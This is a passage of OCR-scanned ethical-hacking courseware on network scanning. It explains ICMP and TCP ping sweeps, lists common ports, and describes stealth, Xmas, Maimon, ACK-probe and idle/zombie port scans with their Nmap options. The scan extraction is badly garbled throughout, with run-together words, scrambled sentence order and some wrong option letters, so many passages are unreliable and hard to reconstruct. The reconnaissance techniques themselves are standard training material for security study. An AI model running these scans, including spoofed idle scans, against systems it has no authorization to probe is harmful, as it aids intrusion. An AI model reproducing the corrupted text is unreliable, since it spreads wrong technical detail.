end.This timestamp pinginggenerally time synchronization.
a ping method is effective i n identifying
Such
whetherthe destinationhost machineis active,
in the conditionwherethe administratorblocksthe traditionalICMPECHO ping
requests. In Zenmap, the -PP optionis usedto perform a n ICMPtimestamp pingscan.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Target 10
Command [pmap2n-PP 10101010

5
Hows]
« Host
Senices
=
| Ports/HostsTopology
Nmap Ovtput
pemap-an-PP 1,
Host
Details Scant
Detail
® 10101010
)
fnmap.org at 2019-06-07

1 1°
fwnsa-done:
FiterHosts

Figure
ICMPAddressMaskPingScan
ping
in
3.26:CMPtimestamp Zenmap

ICMP addressmaskping is anotheralternativeto the traditionalICMP ECHOping, wherethe

the subnetmask.However, the

target
attackerssendan ICMPaddressmaskqueryto
the addressmaskresponse
hostto acquireinformationrelatedto
fromthe destinationhostis conditional,
andit may
or
maytarget's
with subnet
appropriate
notrespond the
bythe administratorat the valueon itsidentifying
depending configuration
end.Thistypeof pingmethodis alsoeffectivei n
the active hostssimilarly
the traditionalICMPEchoping. In Zenmap,
maskpingscan,
when
specifically
to theICMPtimestamp ping, theadministratorblocks
the -PM optionis usedto performan ICMPaddress

Zena

—
Command: en 6M 10101010
[Fenap

|| | Output Detail
Hosts

«
05 Host
Services Nmap
map -s0-PR10.1010
Ports/HostsTopology
Host Scant
Details
® 1010
Nmap
( ) Starting 7.78
nttps://nmap.ore at 2019-06-07

aap-dane: i 1? sdaresz (2 host up) zcanne:

2.27;ICMPaddress
Figure mask
ping Zenmap
in
ical andCountermensores
Mackin ©by E-Comel
Copyright
TCPSYNPing
Scan

ping
TCPSYN
online host
discovery
check technique
encounters
and to probing
is a

firewall
fit
an attackerusesthe Nmap
different discovery is
host any
for portsto determineif the port
rulesets.In thistypeof
tool to initiate the three-way handshake bysending
technique,
the emptyTCP
SYN
to
flag
ACKflag. receiving
SYN,
the target
After reception
bysending flag
acknowledges
host.After
of theACKflag,
terminates the connection an RST
the target host

to the target
the receipt

hostmachine(since
with an
the attackerconfirmsthat the targethostis active and
his/her
objectiveof hostdiscovery is accomplished). Port80 is usedas thedefaultdestinationport.A
rangeof portscan alsobe specified i n this typeof pingingformatwithout inserting a space
between-PSand the portnumber(e.g,, PS22-25,80,113,1050,35000), wherethe probe will be
against
port
parallelly.
performed each
ping
scan.
In Zenmap, the ~PS optionis usedto perform SYN
aTCP

‘Attacker Figure3.28:
TCPSYNpingscan for host ascovery
Target
Host

Advantages
=

can parallelly,
As themachines bescanned
waitingforthe response.
the scan never getsthe time-out error while

=
TCP SYN ping can be usedto determineif the host is active without creating
any

the
logs
are
not
connection. Hence, recordedat the system
attackerto leaveno traces for detection.
or
network
level, enabling
the

Zenmap

fenapen PS 170305

imap
OutoutPorts/Hosts Topology
Hest DetailsScans

© 10101010 Sterting Neep 7.76

Figure
3.29:
SYNin
TCP pingsean Zenmap

ical andCountermensores
Mackin ©by E-Comel
Copyright
TCPACKPing
Scan
TCP
ACK
pingto albeitvariations.
is similar TCP

the targethostdirectly.
ACKalso
uses
SYNping,
defaultport80. In the TCPACKpingtechnique,
with minor TCP ping
the attackerssendan empty TCPACKpacket
Sincethereis no priorconnection betweentheattackerandthe target
the
to

host,after receivingthe ACKpacket, the target hostresponds with a n RSTflag

to terminate the
request.
packet
theoption
Zenmap, -PA ataTCP
Thereception
end host
of this RST
ACKis usedto perform
the attacker'sindicatesthat the inactive. In
pingscan

Hosts Active RSTpackets

Target
Host
Figure
3.20: TP ACKpngscan for host
dscovery

Both the
bypassing
the SYNandthe ACKpacket
can beusedto
firewallsare mostly
firewall.However, configured
maximize
to blocktheSYNpingpackets,
asthey
the chances
of

aremost
common
the
pinging
technique. be In suchcases,the ACKprobe
thesefirewallrulesetseasily
usedto bypass
c an effectively

Profle Help
Tongee,(101010 Profile

sn
Comment. [pap -PA10310,1010

Hots
=
|| | Nmap
Output Detals
Services
[remap -sn-PA 1:
Ports/HostsTopology
Host Scans
Deas
® 10101010
unas ) starting
2237
hntepsi//nmap.org
Seancara Tse
seport for 10.10.10.10
Os latency)
at 2019-06-07

IP Protocol
Ping
Scan
3.31:
Figure TCP
ACKpngsean in Zenmap

IP protocol pingis thelatesthostdiscoveryoptionthatsendsIP pingpackets

withthe IPheader
of anyspecified protocol
tries to senddifferent format
number.It hasthe same
packets hoping
as theTCPandUDPping.Thistechnique
usingdifferentIP protocols, to geta responseindicating
a is
that host online.

ical andCountermensores
Mackin ©by E-Comel
Copyright
Multiple
packets
ICMP
(protocol
IP
IGMP
(protocol
for
configuring
default when no protocols
(protocol
1),4)
are specified.

DEFAULT_PROTO_PROBE_PORT_SPEC
change
For
specific
protocols
2),andIP-in-IP
the default protocols,
compile
innmap.hduring time. For
are sent by

suchas ICMP,
IGMP,
TCP(protocol
6),and UDP(protocol
17),the packetsare to be sent with
andforthe remainingprotocols,
headers,
properprotocol onlytheIP headerdata is to be sent

Target
Host
332: 1°
Figure pingscan forhost
protocol discovery

attackers
In a nutshell, senddifferentprobe packets ofdifferentIP protocols
to thetargethost;
anyresponsefrom any probeindicatesthat a hostis online.In Zenmap,the -PO optionis used
to perform
an IP protocol
pingscan.

7
Services Nmap OutputPorte/HesteTopology
m ap 0-70 10101010
Most
Details Scans
Detail
® 10103010 Starting tinap 7.78
(
nttps://nmap.org ) at 2019-06-07

Fier Heats
Se soe
Figure
1P
3.3: protocol
pingsean in Zenmap

ical andCountermensores
Mackin ©by E-Comel
Copyright
 ModuleFlow

[Network Scanning
Concepts
Port
and ServiceDiscovery

Tools FD
Seanning osciscvery
Gamer crating?
(05Fingerprinting)

Scanning
Beyond
IDSandFirewall

Port and ServiceDiscovery

Thenext stepi n the networkscanningprocess involveschecking theopenportsandservices i n
After performing
live systems. a ping scan,once attackersdetectthe live systems i n the target
network, theytryto findopenportsandservices i n thediscovered live systems.Thisdiscovery
of open ports and services can be performed via various port scanning techniques.
Administrators often use port scanningtechniques to verify the securitypolicies of their
whereas
networks,
attackers use themto Identify open portsandrunning services on a hostwith
the intent of compromisingthe network. Moreover,sometimes,users unknowingly
unnecessary open portson their systems. An attackertakesadvantage
keep
of suchopen portsto
launch
attacks. corresponding along
Thissection describes
the common portsand services with various port
scanningtechniques
andtoolsusedbytheattackerto perform
portscanning.
List of Common Ports andServices
Theimportantreserved
portsare listedbelow:
Name
echo Port/Protocol
Theo
ServiceDescription

echo Thudp
discard hep sinknull

9/udp sink
discard
systat
null apes Users

daytime hep

ical andCountermensores
Mackin ©by E-Comel
Copyright
 daytime 13/udp
netstat 15/tep
gota hep Quote
chargen asitep ttytstsource
chargen 19/udp ttytstsource
ftp-data 2ojtep fapdatatransfor
ftp 2aftep ‘fp
command
ssh 2aptep Secure
Shel
telnet 23/tep
SMrP 2siteo Mall
time a7/tep
time 37/udp Timeserver
rlp 39/udp
nickname a3hten whois
domain 53/tep domainnameserver
domain 53/udp domainname server

sqi*net esytep OraclesaLnet

sqi*net
bootps 66
/udp
erhep
Oraclesalnet
bootpserver
bootps 67/udp bootp
server

bootpe eaten bootpclient

bootpe 68/udp bootpclient
teep ea/tep TrivialFileTransfer
tftp 69/udp TrivialFileTransfer
gopher 7onten gopher
server

finger 9/tep Finger

wew-hetp so/tep www
wew-hetp So/udp www
Kerberos Beep Kerberos
Kerberos 88 /udp Kerberos
pop 109/tep Postoffice
V.2
Pop3 nioftep Postoffice
V.3
sunrpe niftep RPC
4.0 partmapper
sunrpe a/udp RPC
4.0 partmapper
auth/ident 1a3/tep ‘Authentication
Service
auth 113/udp ‘Authentication
Service

ical andCountermensores
Mackin ©by E-Comel
Copyright
 audionews nafep ‘Audio
NewsMulticast
audionews i1a/udp ‘Audio
NewsMulticast
antp Las/tep UsenetNetworkNewsTransfer
antp 119/udp UsenetNetworkNewsTransfer
ate n2a/tep NetworkTimeProtocol
Name Port/Protocol Description
ntp 123/udp NetworkTimeProtocol
netbios-ns s7/tep INETBIOS
NameService
netbios-ne 137/udp [NETBIOS
NameService
netbios-dgm 13a/tep [NETBIOS Service
Datagram
netbios-dgm 138/udp Datagram
[NETBIOS Service
netbios-ssn 139/tep NETBIOS
Session
Service
netbios-sen 139/udp INETBIOS
Session
Service
imap 1a3hep InternetMessage
Access
Protocol
imap 443/udp InternetMessage
Access
Protocol
sqi-net 1so/tep SQLNET
sqi-net 150/udp SQLNET
sqisrv 156/tep Sal Service
eqlery 156/udp SQLService
enmp 1eifep
enmp 161/udp
snmp-trap 1e2/tep
snmp-trap s62/udp
cemip-man 163/tep ‘CMIP/TCP
Manager
emip-man 163/udp cmp
emip-agent
cmip-agent
re4ahtep
164/udp
COMIP/TCP
Agent
cmp
194/tep InternetRelay
Chat
194/udp Internet Relay
Chat
at-rtmp 2ox/tep ‘AppleTalk
RoutingMaintenance
at-rtmp 2o1/udp ‘AppleTalk
Routing
Maintenance
at-nbp 2oz/tep ‘AppleTalk
NameBinding
at-nbp 202/udp ‘AppleTalk
NameBinding
at-3
at-3
203
/tep
203/udp
‘AppleTalk
AppleTalk
at-echo 2o4/tep ‘AppleTalk
Echo

ical andCountermensores
Mackin ©by E-Comel
Copyright
 2oa/udp
/tep ‘AppleTalk
at-echo
at-5 205 AppleTalk
Echo

at-5 205/udp AppleTalk

206/tep
at-zis

206/udp Zone
at-zis
‘AppleTalk
ZoneInformation
‘AppleTalk
information

2o7/tep
at-7

207/udp
at-7
AppleTalk
AppleTalk

208/tep
at-8

208/udp
at-8
AppleTalk
AppleTalk

2a3/tep
ipx

213/udp
ipx
Novell
Novel

220/tep
imap3
220/udp
imap3
InteractiveMailAccess
Protocolv3
InteractiveMailAccess
Protocolv3
aurp 387/ep ‘AppleTalk
Update-Based
Routing

387/udp
aurp

396/tep
netware-ip
AppleTalk Routing
Update-Based
NovellNetwareover IP
netware-ip 396/udp NovellNetwareover IP

Port/Protocol
Name
mt ani/tep
Description
Remote
mt

ani/udp mt
kerberos-de
mt

a4s/tep
Remote
Microsoft05

kerberos-ds
445/udp
500/udp
isakmp
Microsoft0S
ISAKMP/IKE

510/tep
fep
siz/tep 8)
exec
FirstC lass
Server
850rexecd(

comsat/bift
S12/udp
513/tep
login
used bymailsystemto notifyusers
SD rloging(s)

513/udp
who

s18/tep
shell
850rwhod{@)
‘whod
BSDrshalé)
‘emd

S1a/udp
515/tep £850
syslog
B50
printer
syslogd)
spooler Indl)

515/udp
si7/tep Spooler
Printer
printer
talk 880talk)
talk s17/udp Talk

518/udp
ntalk

s18/udp
atalk
NewTalk(talk)
un0s talkal@)

03
Module 280
Page ical andCountermensores
Mackin ©by E-Comel
Copyright
 netnews 532/tep Readnews
uuep Sé0/tep ‘wucpa
850wuepel)
uuep S40/udp ‘wucpa
850wuepels)
login 543/tep Kerberos
Login
login $43/udp Kerberos
Login
kshell Séa/tep Kerberos
Shell
Kshell Saafudp Kerberos
Shell

ekshell encrypted
kremdKerberos remote shel
“Kall
peserver PCboardsv
ECDIntegrated
mount 635/udp NFSMountService
penfs e40/udp PC-NFS
DOSAuthentication
wns 650/udp BBW-NFS
DOSAuthentication
flexim 7aa/tep Flexible Manager
L icense
flexim 7aajudp Flexible
i censeManager
Kerberos-adn
Kerberos-adn
Tas
/tep
7a9}udp
Kerberos
Administration
Kerberos
Administration
kerberos 7s0/tep authentication—tep
keeKerberos
kerberos 750/udp Kerberos
kerberos_master 751/udp authentication
Kerberos
kerberos_master 7sa/tep authentication
Kerberos
kxb_prop 7sa/tep slavepropagation
Kerberos
999/ud ‘Applixware
socks 1080/tep
socks 1080/udp
kpop nios/tep PopwithKerberos
ms-sql-s 1433/tep Microsoft
SOLServer
ms-sql-s 1433/udp MicrosoftSO Server

ms-sql-m 1a3a/tep MicrosoftSQLMonitor

ms-eql-m 1434/udp MicrosoftSal Monitor

pptp 13/tep Poe
pptp 1723/udo Pot
nfs 2o89/tep NetworkFileSystem
nfs 2089/udp NetworkFileSystem
eklogin 2i0s/tep rlogin
encrypted
Kerberos

ical andCountermensores
Mackin ©by E-Comel
Copyright
 rkinit
ex
2i08/tep
2unihep
Kerberos
remoteknit
Xaver Kerberos
auth 2i2o/tep Remotekau

lyskom asoaniep ‘ysKOM

(conference
system)
sip
eip
S060/tep
5060/udp
Session
InitiationProtocol
Session
InitiationProtocol
x1 6000-6063/tep x WindowSystem

x11 16000-6063/udp x WindowSystem

ire
6667/tep InternetRelay
Chat

ats
age
7000-7009/udp
"7000-7008/udp
‘Andrew
FileSystem
FileSystem
“Andrew

Table
32: table
Reserved
ports

03
Module 282
Page ical andCountermensores
Mackin ©by E-Comel
Copyright
 PortScanning
Techniques

Port Scanning
Techniques
Portscanningtechniques
on thetype
of
are
protocol further
as
categorized
described
below.Thiscategorization
usedforcommunication i n thenetwork. isbased
TePScanning:
Open TCPScanning
Methods
©

Stealth
Open
Scan
TCPConnect/Full
Methods
TCPScanning

Half-open Scan
©
TCP
Inverse
Flag
Scan
©

Xmas
*FINScan
Scan

© NULLScan
© Maimon Scan

‘ACK
Flag
©
Scan Probe
TTLBased Scan
© Window
Scan
andSpoofed
‘ThirdParty TCPScanning
Methods
© IDLE/IP
1DScan
Header

ical andCountermensores
Mackin ©by E-Comel
Copyright
UDPScanning:
+
UDPScanning
Scanning:
SCTP
+
SCTPINIT Scanning
=
COOKIE/ECHO
SCTP Scanning
Scanning:
SSDP
=
SSDP
and
Pv6 Scanni
List
Scanning

=
[Pv6Scanning

ical andCountermensores
Mackin ©by E-Comel
Copyright
 TCPConnect/Full Open
Scan

tvee-way
handshake
‘The
TCPConnectsan detectswhena partsopen afte
competing the

by
T c connectscan estabihesfullconnection andthencloses
connection sending
‘the an RST packet
Iedoesnotrequiresuperuserprivileges

ae

TCPConnect/Full Open
Scan
Source:http://insecure.org
TCPConnect/Full
OpenScanis one of the most reliableformsof TCPscanning. In TCPConnect
scanning, the OS's
on the target
TCP
() call () to of
connect system tries to opena connection
machine.If the portis listening,
everyport interest
the connect callwill resulti n a successful

on
connectionwiththehost that particular
that the portis not reachable.
a three-way
Connectscancompletes
‘TCP handshake
port;otherwise,it wll return an error message

with thetargetmachine.In theTCPthree.

stating

wayhandshake,
packet.
Then,
a SYNpacket,
theclientsends
the clientacknowledges
connection. Oncethe handshake
whichthe recipient
the SYN+ACK
i s completed,
packet acknowledges
a SYN+ACK
to complete
with a n ACKpacket
the scanner sendsan RSTpacket
with
the
to end the
connection

attacker
Scan
when
is
Figure3.3: result a
Target
port open
Sri Packet
+ Port)

Atacker 3.35:Sean
Figure r esultwhena por iclosed
Target

ical andCountermensores
Mackin ©by E-Comel
Copyright
Making
time over a
non-blocking,
Using
()
connect callforeverytargeted
a separate portin a linearmanner
would
a
take long
the scan usingmanysocketsi n parallel
slowconnection.Theattackerc an accelerate
1/0allowsthe attackerto set a shorttime-out period andwatchall the
socketssimultaneously.
In Zenmap, the -e optionis usedto perform TCP Connect/fullopen
sean.

map 3 bats

is penand
3.36:TCPConnect/Fullsean
Figure usingZenmap

‘The
of
this
type
of
scan
drawback thatitis easily
will disclosethe connection, Suchscanning
system
detectable filterable,Thelogs i n the target.
doesnot require superuser privileges.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 StealthScan(Half-open
Scan)
ives
the
Steathscanning
abruptly
the
TCP
the esting
betwean centandserve before completion
wayhands sgnal,ths leavingt he
connection
connection
ofhee
halagen
‘tala ue

bypass
firewall
seth canningtechniques
o

eer)
aa. AY
saree
StealthScan(Half-open Scan)
Thestealthscan involvesresetting
beforecompletion
theTCPconnection betweentheclientandthe
ofthethree-way
A stealthscan sendsa single
handshakesignals,hencemakingthe connectionhalf-open.
frameto a TCPportwithout any TCPhandshaking or additional
server
abruptly
packettransfers.
Thehalf-open This
type
ofscansends
scan partially
alsocalleda “SYN
a single
framewith theexpectation
opensa connection but stopshalfway
becauseit only
scan,―
of a single
through.
sendsthe SYNpacket.
response.
Thestealthscanis
Thisprevents the service from
notifying the incomingconnection. TCPSYNor half-open scanningis a stealthmethodof port
scanning.
Thestealthscan alsoimplements the three-way handshakemethodology. In thelaststage, it
examines the packets enteringthe interfaceandterminates the connection beforetriggering a
‘newinitializationto identify
remote ports.Thestealthscan process is describedbelow.

+
The

client
sends a singleSYNpacket to the
Ifthe portis open,the server subsequently
responds
on the
server
with a SYN/ACK
appropriate
packet
port.
‘=
Ifthe server responds
with an RSTpacket,
thenthe remote portis i n the “closed―
state.
The client sendsthe RST packet
to closethe initiation before a connection can be
established.

SYN
80)
“eat
(Poet
ACK Pact

cose
>

Bilt
10.00.2202
wr

337:Portis open
Figure

ical andCountermensores
Mackin ©by E-Comel
Copyright
 S19(Port
Por 8090)
< oo

sill Portis closed

Figure 3.38:
Sheela

Attackers
use stealthscanning
techniquesto bypass
firewallrulesandloggingmechanisms, and
theyhide themselvesa s usualundernetworktraffic. In Zenmap,the ~sS optionis usedto
performa stealth
scan/TCP half-open
scan.

rg
40.[40.10-30

Bet
anny $32 riitere

Bae.
Aadenes 807001 29:00:74:93(Ware

1iP
90
Nese-aonel

3.30:TCP
Figure stealth/Half
Open

ical
scan Z enmap
using

andCountermensores ©by E-Comel

Mackin Copyright
 InverseTCPFlagScan

‘Aitachars
\©
end
probe
packets
(FIN,
PSH)
with
TEP
no no with2 TCPflag URG, stor fas, Where response

& een
onwopen

Portis closed

InverseTCPFlagScan
AttackerssendTCPprobe packets URG,PSH)
with a TCPflag(FIN, set or with no flags.
Whenthe
portis open,theattacker doesnot getanyresponsefromthe host,whereas whenthe porti s
closed,he or shereceives the RSTfromthe targethost.

I
roteraaanuna/rsaynay

oo
Attacker
K< NoResponse
Target
Host

Figure
340:scan
when
portis fag
Inverse TCP

ProbePacket(FIN/URG/PSH/NULL)
open

st/ack
Target
Host
flagscan whenpots dosed
3.41:inverseTCP
Figure
Security
SYNflag
mechanisms
of the targetedhosts.Programs
scan attempts.
suchas Synlogger
At times,the probe
andCourtney
packets
sent
suchas firewallsandIDSdetectthe SYNpackets to the sensitive ports
are availableto loghalf-open
enabledwith TCPflags can passthrough
filtersundetected,depending on the security
mechanisms installed.
invertedtechnique
‘An involvesprobing a targetusinga half-open SYNflagbecausethe closed
portscan onlysendthe responseback.According to RFC793,a n RST/ACK packet is sent for

ical andCountermensores
Mackin ©by E-Comel
Copyright
connection reset whenthe hostclosesa port.Attackerstakeadvantage of this featureto send
TCPprobe packets to eachportof the targethostwith various TCPflags
s et
Common flag
configurations
usedfor a probepacket
include:
=

=
AFIN
Xmas
An
probe
probe TCP TCP
withtheFIN

with set
flagset
the FIN,URG,
andPUSH flags
=

=
ANULL with
ASYN/ACK
TCP
probe
probe
no flagsset

All closed
portson thetargetedhostwill sendan RST/ACK response.SinceOSs suchas Windows
completelyignoretheRFC793standard, youcannot see the RST/ACK responsewhenconnected
toa closedport on the target
host.However, thistechnique is effectivewhenusedwith UNIX:
basedOSs.
‘Advantages
=
Avoidsmany IDSandlogging highly
systems; stealthy
Disadvantages
=
Needsraw accessto networksockets, privileges
thusrequiringsuper-user
=
Mostlyeffectiveagainst
hostsusinga BSD-derived stack(noteffectiveagainst
TCP/IP
MicrosoftWindowshosts,i n particular)

the probeTCPno
isset, as
NULL on
the
scanning.
If there is
only
the flag
Note: Inverseflagscanning knownas FIN,URG,
packet.
flag flag
itis known
andPSHscanningbased
If
set i n
FIN is set,it
as if
is known FIN scanning,
set, as
and all ofFIN,URG,andPSHare it is known Xmas
scanning.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Xmas Scan

Using
(©
xmas frame ronn
the
ontpot
sa, attachers
send aT toa
Zrmes usingZenmep

xe

XmasScan
Xmasscan is a typeof inverse TCPscanningtechnique with the FIN, URG, andPUSHflags s et to
senda TCPframeto a remote device. hasopened
If thetarget theport,thenyou will receive no
response
system the
from remotesystem.
replywith an RST. has
Ifthe target closed
You can use thisport scanning
find whichhostis up andwhat services it is offering.
the port,thenyou
technique
Thistechnique
will
to scan large
describes
receive
remote
a
networks and
all TCPflagsets.
Whenall flagsare set,some systems hang; the flags
hence, are oftenset i n the nonsense pattern
URG-PSH-FIN, Attackersuse the TCPXmasscan to determineif portsare closedon the target
machinevia the RSTpacket. Thisscan onlyworkswhensystems are compliant with RFC793:
based
TCP/IP work
any
current
version
Microsoft
Windows
implementation. It will not against of
FIN+ URG+ PUSH
acta
No Response
|
—

Attacker
10006
Server
10008:23
3.42;xmasscan whenthe port open
Figure

Attacker
10006

ical andCountermensores
Mackin ©by E-Comel
Copyright
BSDNetworking
Code
Thismethodrelieson the BSDnetworking code.Thus, you can use thisonlyfor UNIXhosts; it
doesnot supportWindows NT. If the user scans any Microsoftsystem,it will showthat all the

onhost
ports the
Transmitting
are open.
Packets
Youcan initializeallthe flags the packet
whentransmitting to a remote host.Ifthe target system
accepts
not
the packet
sendsan RSTflag,
system that
anddoes sendanyresponse,it means
then it implies
that the portis closed,
the portis open.If the target

‘Advantages
=

Itavoids
Disadvantages
TCP IDSand handshake
three-way

Itworks
In Zenmap,
UNIXonly.
on the
perform
the ~sx optionis usedto
platform
Xmas scan whereasthe ~sF and ~sN options
a re
usedto performFINscan andNULLscan,respectively.

Tepe [10101010

Hoss
|| | Senices nmap Ovtps
=
Pons /Heats Topelogy
Hest
Detae Scant
at

Pies
Nese-conei
up)
aad qate tiles
1 iP
tram: C:\progran
post
(1x86)
seames
Wrap

3.44:Xmas
Figure scan outputu singZenmap

ical andCountermensores
Mackin ©by E-Comel
Copyright
 TCPMaimon Scan

(©
probes,
FIN/ACK
Atachors send andi

RSTOpen|
Filtered,
heres
no response, thepor
then is
butfan packet s sentin then
responce,
the portis closed

open x

eg
TCPMaimon scan
Thisscan technique is very similarto NULL, FIN,and Xmasscan, but the probe usedhere is
FIN/ACK. In most cases,to determine if the portis openor closed, the RSTpacket shouldbe
generated as a responseto a probe request. However, i n many BSD systems,the portis open if,
thepacket getsdropped in response to a probe.
Nmap interpretsport open[filtered
a as whenthereis no responsefromthe Maimonscanprobe
even
after
filtered whentheICMP
Theportis
fromthe targethost.In Zenmap,
(typeas
manyretransmissions.Theportis closedif the probe

unreachable
error
getsa response an RSTpacket.
3,code1,2,3,9,10,or 13)i s returned
the ~sM optionis usedto perform theTCPMaimonscan,
FIN/ACK
Probe
ee No Response
ja) x<
Attacker Target
Figure
3.45:
Maimon
scan
TCP

FIN/ACK
of
pen
port result

Probe
4-4
oe
>

20
I <
RSTpacket
‘Attacker Target
Figure
3.46:
scan
of
TCPMaimon result sed port

ical andCountermensores
Mackin ©by E-Comel
Copyright
 FIN/ACK
Probe

ICMPunreachable
error

Attacker Target

© ras010%0
acting
heap 7 fe) at 2039-10-25

Figure3.48:
1? Maman scan portstate in Zenmap
displaying

03
Page
Module 296

tical
Making
and by CountermensoresCopyright©
Comet
 ACK FlagProbeScan

sand
\G: Aetackers
TCP
probe
packets
ACK
remotethe
st
header
withan lg toa device, andthen
analyze

sac

ACK FlagProbe Scan (Cont'd)

|
send
Atackers
ACK withsequence
number,
stateflfrewal'
‘ered
present),
an

no
response
meansimplies
that
probepacket random
whereasan RST
response
nd
thatthe pots nat tered
theports

xe:
>|

ACKFlagProbeScan
sendTCPprobe
Attackers packets
withtheACKfla set to a remote deviceandthenanalyze
the
ofvulnerabilities
or ACKexploits
open closed.
stack.Thus,
to
headerinformation(TTLandWINDOWfield)the receivedRSTpackets
The flagprobe scan the
find out f the portis
withinthe BSD-derived
suchscanningis effectiveonlyon thoseOSsandplatforms
on whichtheBSD
TCP/IP
derives
TCP/IPstacks.

Module
3 295
Page ical andCountermensores
Mackin
©
by
Copyright E-Comel
 ofACKflag
Categories probe scanninginclude:
=
TiL-basedACKFlag Probescanning
In this scanning technique,
you will first need to sendACKprobe packets(several
thousands)
based
scan.
to the
TCP
ports the
different
received.InZenmap, TTL
field
andthenanalyze
syntaxnmap -tt1
valueoftheRSTpackets
[time] [target] is usedto perform
TTL

Target
Host
349:TLbasedACK
Figure
If the TTLvalueof the RSTpacket
lag
probe
on a particular
sanning

portis lessthanthe boundary

valueof
64,thenthat port is open.An example
is presentedbelow:
showing
a
logofthefirstfour RSTpackets
received

aopen
onthe
value
Figure
3.50:Screenshot
showingthe portbased TTL ofthe RST
packet
In this
example,
TTL
value
of less
port 22 returned
returneda TTLvalueof80,whichis greater
50, whichis than 64;all other ports
than64,Therefore,
port22is open.
ACKFlag
Window-based Probescanning
In this scanning technique,
you will first need to sendACKprobe packets(several
RST TCP
thousands)
use
packets.
when
all ofthe
to different portsandthenanalyze
Theuser can
the windowfieldvalue the received
this scanningtechnique the portsreturn same
TTL
value.
the
~sW
option a scan.
In Zenmap, is usedto perform

cx robe Paces
window

ne
n< RSTResponses
vee

Attacker TargetHost

If the windowvalueof the RSTpacket

ACK
2 51: Window-bacedfagprobe scanning
Figure
on a particularportis non-zero, then that portis
An example
‘open, showing a logofthe firstfourRSTpackets receivedis presented below:

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Figure3.52:
Theabovefigure
Screnshoshowing
theopen
portbased
onthewindow
valueofhe AST
showsthat the TTLvaluereturnedfor eachpacket
packet
is the same; hence,
you cannot perform TTL-based ACKflag probe to
scanningfindthe openports.Therefore,
when you observethe windowvalue,the third packet hasa non-zero windowvalue,
whichmeans

error (type
that
theis port open,
closed.If thereisno response
Whenthe returnedRSTvalueis
even aftermanyretransmissionsandan ICMPunreachable
3,code1,2,3,9,10,or 13)isreturned,
zero,is
thenthe port
thenthe ports inferredto be afiltered

im
TCP/ACK
Probe

‘TCP
RSTwith non-zero windowfield
Target
sean
result
open $3:TCPWindow

TCP/ACK
ofan port

Co
Probe
me

Attacker window
TCPRSTwith zero field =

Target
Figure
3: TCPWindow
scan result
of closed
p ort

il
TCPIACK
Probe

Attacker Figure2.5:TCPWindowscan resultof fltered

port
Target

Advantage:
‘Thistypeof scan can evadeIDSi n most cases
Disadvantages:
+
Itis extremely
slowandcan exploit
onlyolderOSswith vulnerable
BSO-derived
TCP/IP

ical andCountermensores
Mackin ©by E-Comel
Copyright
Checking
theFiltering ofTarget
Systems Networks
TheACKflagprobe scanningtechniquealso helpsi n checking
the filtering of target
systems
networks.Theattackersendsan ACKprobe to checkthe filtering
packet (firewalls)
mechanism
of packets
employedbythe targetnetwork.
Sending
an ACKprobe
packet
witha randomsequencenumberandgettingno responsefromthe
targetm eansthattheportisfiltered(stateful firewallis present);
an RST fromthetarget
response
means that the portis not filtered(nofirewall is present).

ProbePacket(ACK)

Attacker Target
Host

Flag
‘ACK ProbeScanning
usingNmap
In Zenmap,
the ~sA optionis usedto perform
an ACKflag
probe
scan.

358:ACKFlag
Figure Probe
scanningusingZenmap

ical andCountermensores
Mackin ©by E-Comel
Copyright
 IDLE/IPID Header Scan

Se er

© ern

sgen ts
wena mice ————
Om.
ron
Sh

{ett it anne sere

bck PO Pin,

IDLE/IPID Header Scan

address port
TheIDLE/IPID
Headerscan
to a computer
isa TCP scan methodthat you can
to findout whatservicesare available.
use
It offerscomplete a
to send
blindscanning
of a remote host.Mostnetworkservers listenon TCPports,suchas web servers on port80and
spoofed
source

rail
servers
25.
a is
on port A portis considered “open'
way to determinewhether portis open to senda "SYN"(session
port.Thetargetmachine will end backa "SYNACK" (session
is listening
if an application onthe port.One
establishment)packet
requestacknowledgement)
to the
packet
if the portis open or an "RST"(Reset) packet if the portis closed.A machinethat receives an
unsolicitedSYN|ACK
IPpacket
packetwill respond
on theInternethasa “fragment number(IPID).
identification― wil
with an RST.An unsolicitedRST be ignored. Every
TheOSincreasestheIPID
for eachpacket
the
ast probe.
sent;thus,probing

the
an IPID givesan attacker
In Zenmap, ~sT optionis usedto perform the IDLE the
numberof packetssent since

scan.

359:DLE/IPIO
Figure Header
scan usingZenmap

Theattackerperforms
thisscan byimpersonating via spoofing.
anothercomputer Theattacker
doesnot senda packet fromher/his
IP address;
instead,he/sheusesanother oftencalled
host,
a “zombie,―
to scan the remote hostand identify
any open ports.In this attack,
the attacker

ical andCountermensores
Mackin ©by E-Comel
Copyright
expectsthesequencenumbersof the zombiehost,andif the remote hostchecks
theIP of the
the IPof the zombiemachinewill be displayed,
scanningparty,
IDLEScan

Every IPpacket on the Internethasa fragment

Internetprotocol
identification number
(IPID) that
Uniquely identifiesfragments of an original
IP datagram.
As many OSssimply increase this

number packet
that the
foreach theysend,
the user sent since the lastprobe.
probing IPIDcan tell an attackerhowmanypackets
=
Step2

assigns an
performing
Thefirst stepi n
IPIDpackets incrementally
on a global
zombie.Azombiethat
idle scan is to find a n appropriate
basisis an appropriate
or idle zombiefor

the
idle
performing scan. shorter
attacker-zombie time
interval between
The
thethe
andthe zombie-target,
for request/response
the fasteris the scan.

a IP
andProbeits Current Identification(IPID)
Choose “Zombie―
packet
In the first step,you will sendthe SYN+ACK
Number
to the zombiemachineto probei ts

number.
Here,
IPID
a TCP SYN*ACK probe
the
the
connection (three-way
packetis sentto
handshake)
IPIDnumber
butnot establish

.f Probe IID SYN ACKPacket

+

LBP ii03i337 sconce:

‘Attacker RSTPacket

‘As
Figure
360:1
the zombiedoesnot expecta SYN*ACK
OLEscan: Step

packet, it will deny

the connection bysending
backa n RSTpacket.Analyzethe RSTpacket sent bythezombie machine to extract the
IPID.In the diagram
showni n the slideabove,assumethat the zombieresponds with
IPID=31337. Furthermore,assume that this IPID is X

Step2
Theattacker
sends
aSYN
of the zombie. to machine
port
80,
spoofing
address
packet the target on theIP

IdleScan:Step 2.1 (OpenPort)

If the portis open,the targetwill sendthe SYN+ACK (asthe IP
to the zombie
packet
addresswas spoofed)
to proceed
with the three-way
handshake. Sincethe zombiedid
a SYN+ACK
not expect fromthetargetmachine,
packet withan RSTpacket.
it will respond

ical andCountermensores
Mackin ©by E-Comel
Copyright
 >
range

Zombie
361: Portis open
Figure
hasa "fragment
SinceeveryIPpacket identification―
